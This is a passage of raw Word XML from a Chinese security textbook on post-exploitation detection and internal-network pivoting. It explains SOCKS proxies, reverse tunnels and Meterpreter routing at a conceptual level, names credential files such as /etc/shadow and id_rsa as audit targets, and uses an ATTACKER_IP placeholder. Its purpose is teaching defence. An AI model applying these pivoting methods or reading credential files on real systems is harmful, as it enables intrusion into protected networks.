      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重点关注：(a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">非服务账户进程派生的新进程；(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程链的异常性（如cmd.exe的父进程是w3wp.exe而非explorer.exe）①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计规则：对/etc/shadow、~/.ssh/id_rsa等敏感文件的读取操作配置审计策略（Linux:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd；Windows:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SACL）①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络流量分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内网扫描活动的流量特征：(a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">短时间内对大量IP地址发出TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN包；(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对多个目标端口的连接尝试（包括大量RST包返回）①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测点：在核心交换机或防火墙部署NetFlow/sFlow分析，对单IP短时间内连接目标IP数量设定基线告警阈值②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志关联分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将端点进程日志与网络连接日志关联。例如：Web服务器的www-data用户进程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随后该主机对内网网段的大量连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">高置信度异常①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将命令执行审计日志与正常业务行为基线比对。基线可以基于历史数据建立：某台服务器正常工作日中从未执行过arp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a命令，某日凌晨3点突然出现该命令执行事件，应触发告警②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修复/防御措施：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则：Web服务、数据库等进程使用专用低权限账户运行，限制其可执行的命令和可访问的文件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段：将不同安全等级的系统部署在不同子网中，从Web服务器所在的DMZ段不应能直接访问数据库服务器的管理端口②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及时修补漏洞：后渗透的起点是一个被利用成功的漏洞。消除初始入侵点是最根本的防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 18.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内网枢轴（Pivoting）：借助立足点延伸攻击面</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**动机：攻击者视角**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集完成后，攻击者面对的情况往往是：初始立足点所在网段是DMZ区或边界区域，真正的数据库服务器、域控制器、文件服务器位于更深层的、从互联网不可直接访问的内网段中。攻击者无法直接从外部连接到这些目标——这正是防火墙和网络分段设计的初衷。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但攻击者拥有一个关键的优势：已控制的主机本身可以访问那些深层网段。这台主机处于两个（或多个）网络的交汇点——一块网卡连接外网（攻击者可达），另一块网卡连接内网（目标可达）。攻击者只需要让这台主机充当网络代理，将攻击流量"中继"到内网目标即可。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这个过程就是枢轴（Pivoting）——以已控主机为支点，将攻击面从当前网段延伸到原本不可达的网段。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**原理直觉：类比解释**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以把内网想象成一栋办公楼。攻击者目前只能进入大堂（DMZ网段），但核心档案室（数据库服务器）在二楼，需要门禁卡（网络分段+防火墙规则）才能进入。攻击者在大堂找到了一台连接二楼内部电话线的电话机（已控主机有两块网卡，一块接DMZ，一块接内网）。攻击者拨通这台电话，告诉电话那头的人（在电话机后台运行一个网络代理程序）"帮我给二楼的档案室打电话，把对话转给我"。于是，攻击者的话语从大堂电话进入，通过内部电话线到达二楼档案室，档案室的回应沿原路返回。对于档案室来说，打来电话的是大堂的那台内部电话——而不是大楼外的陌生人。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这就是Pivoting的网络模型：攻击者的流量&lt;--&gt;已控主机（代理/转发）&lt;--&gt;内网目标。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**Pivoting的网络底座**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting的技术本质是对IP路由模型的利用。已见《从位到物联》第26章，IP协议的核心功能是根据目标IP地址和路由表决定数据包的转发路径。当一台主机有两块网卡（双宿主主机，Dual-Homed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Host）时，它的路由表决定了哪些目标地址从哪块网卡发出。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者控制的双宿主主机的典型路由配置如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内网网卡(eth1):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP 10.0.1.100/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外网网卡(eth0):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP 192.168.1.100/24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(攻击者可达)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由表:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">default via 192.168.1.1 dev eth0 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认路由走外网</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10.0.1.0/24 dev eth1 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发往内网地址的包走内网网卡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在这种情况下，攻击者无法直接从自己的机器（IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">`&lt;ATTACKER_IP&gt;`）向`10.0.1.50`（内网目标服务器）发送数据包，因为攻击者的数据包在到达第一个路由器时就会被丢弃——路由器不知道`10.0.1.0/24`在哪里（除非路由器也连接内网，但这在隔离良好的网络中不存在）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者需要做的是：让已控主机开启一个网络代理或端口转发功能，接受来自攻击者的流量，然后由已控主机以自身身份将流量转发到`10.0.1.50`①。这就是pivoting的核心机制。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**三种Pivoting实现模式的原理（仅概念，不给武器化操作）**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**模式一：目标机上的代理/端口转发**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者在已控主机上启动一个SOCKS代理服务（如SOCKS5代理），监听在某个端口。攻击者将自己的攻击工具（如浏览器、端口扫描工具）配置为通过这个SOCKS代理发送流量。原理如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者工具发出的流量被封装到与SOCKS代理的连接中，目标地址被封装在SOCKS协议头中③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS代理收到请求后，解析出真正的目标地址，然后以己控主机的本地身份发起新的TCP连接到目标③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回的数据沿反向路径——先回到SOCKS代理，再通过代理隧道返回给攻击者③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于内网目标服务器来说，连接请求来自已控主机的内网IP地址（如`10.0.1.100`），这是一台合法的内网主机，因此防火墙规则不会阻拦①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**模式二：攻击机上的反向端口转发**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当目标内网中有一台主机需要主动连接外部时（例如，攻击者通过钓鱼邮件诱导内网用户执行了一个反向shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload），攻击者可以构建从内向外穿透防火墙的连接隧道。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内网主机主动向攻击者控制的外部服务器建立TCP连接（如反向shell连接）③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦连接建立，攻击者就可以在这个隧道上运行pivoting代理，让其他攻击流量通过这条已建立的隧道进入内网③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种模式的优势在于：内网的出方向规则通常比入方向规则宽松，因为内网用户需要访问互联网服务。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**模式三：路由式Pivoting（Meterpreter风格，概念示意）**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit的Meterpreter会话提供了内置的pivoting能力（`autoroute`命令）。其工作原理是在攻击者的Metasploit框架和已控主机的Meterpreter会话之间创建一个虚拟路由条目：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者告知Metasploit"到`10.0.2.0/24`网段的流量全部通过session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1（与已控主机的Meterpreter连接）发送"③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter将来自攻击者框架的数据包封装在Meterpreter会话协议的TLV（Type-Length-Value）消息中发送给已控主机③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已控主机端的Meterpreter服务还原数据包，通过主机本地socket将其转发到内网目标③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这个概念被实现为Meterpreter的一个模块化能力，但具体的命令参数、网络路径和可用性因Metasploit版本、payload类型、目标系统环境而异②。本书不在武器化层面展开，仅说明其网络原理。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**Pivoting的流量特征与检测窗口**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting活动的核心网络特征是"同一主机作为中继节点，同时连接外网和内网"。这一特征在网络流量分析中有多种可检测表现：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**一、连接不对称性**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常情况下，一台主机的入站连接和出站连接在时间、大小、频率上存在统计规律。例如，Web服务器的入站流量来自客户端，出站流量是对客户端的HTTP响应；两者在字节数上可能存在倍数关系（响应通常大于请求），但存在相关性。当这台主机充当Pivoting跳板时，它会接收到来自攻击者的TCP数据流，然后立即发起一个新的、独立的TCP连接到内网目标①。这两条连接之间没有HTTP响应中固有的"请求-响应"字节相关性——攻击者的加密隧道流量和内网目标的数据库返回流量在字节数上没有固定比例。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种连接不对称性被记录在NetFlow/sFlow数据中：从主机A的端口X流入大量数据，几乎同时主机A从另一个端口Y向主机B（内网目标）发起了一个新连接并传输了等量或相关的数据②。这样的流量模式在正常业务中极为罕见。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**二、已知端口上的异常协议行为**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS代理通常监听在自定义的高端口上，但有些攻击者故意将代理服务端口配置为常见端口（如80、443、8080）以混入正常流量。然而，一个真正的HTTP服务器在80端口上收到的数据应该是HTTP协议格式的（以`GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> /`、`POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/`等方法开头），而封装了SOCKS协议或加密隧道流量的数据不符合HTTP语法①。深度包检测（Deep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Packet Inspection, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DPI）可以通过协议格式校验发现这种不匹配。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**三、主机的角色异常**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在分层网络架构中，Web服务器通常不主动向数据库服务器以外的内网主机发起连接；更不会向同一个内网段中大量的其他主机发起横向连接。如果一台被归类为"Web前端"的服务器突然对内网段的50台主机发起TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN包（端口扫描特征），其行为完全偏离了基线。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**检测对照框：内网Pivoting的蓝队检测与网络分段防御**</w:t>
      </w:r>
    </w:p>
    <w:p>
